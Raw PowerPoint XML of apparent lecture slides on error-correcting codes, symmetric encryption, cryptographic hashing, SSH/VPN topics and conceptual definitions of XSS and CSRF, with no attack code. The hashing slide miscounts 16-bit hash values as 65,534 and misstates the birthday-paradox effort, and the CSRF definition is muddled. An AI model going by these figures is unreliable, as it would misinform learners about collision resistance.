            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the Convolutional codes, while the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Golay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> codes are “perfect” linear codes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: one-to-one (add redundancy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Decoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: many-to-one (even if a small number of errors has occurred during transmission, the received message will be corrected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3692875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pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3.  Encryption/Decryption             (symmetric key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="7620000" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Keyed process (key is secret), invertible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input: key + plaintext + randomness  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ypically: one-to-many</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Decryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input: key + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output: plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ypically: many-to-one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Combines: substitution and transposition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ubstitution: substitutions (mappings) + XOR with parts of the key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ranspositions: shifts </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142762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4. (Cryptographic) Hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="7848600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cryptographic hash function is a hash function which takes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(or 'message') and returns a fixed-size string of bytes. The string is called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>message digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>digital fingerprint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>A cryptographic hash function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ust be easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to calculate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>any given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It must be hard to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>calculate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a different message that has the same hash (find a collision).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xtremely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unlikely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to find a message that has the hash as an earlier message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4202160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219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4. (Cryptographic) Hashing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="7620000" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Keyed process (key is public), not-invertible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Evaluation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input: key and message (arbitrary length)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output: hash (fixed length)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many-to-one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Verification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: given message: m and hash: h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input: key and m </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output: h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verification: h = h’ ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Combines: elementary operations such as shift, XOR modular operations, lookup tables etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Suppose we want to find a collision, given that the length of the hash is 16 bits. Then there are 65,534 hashes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>If we calculate the hash of 65,534 messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>(brute force) we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>have a good chance (better than even --birthday paradox) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>of finding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>collision.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>But finding messages with have the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>hashe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>needs some extra work … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Maybe you are given a clue for this message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Otherwise the brute force attack is much more complicated (a large number of messages must be stored).</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3216301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543800" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Topics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2057400"/>
            <a:ext cx="6858000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH, tunneling and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encodings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(codes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="703402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620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1737360"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xploits the trust a user has for a particular site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                              user     browser     site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>request forgery (XSRF or CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploits the trust a user has in a user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                           X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“two is company, three is a crowd”</a:t>
            </a:r>
          </a:p>
          <a:p>
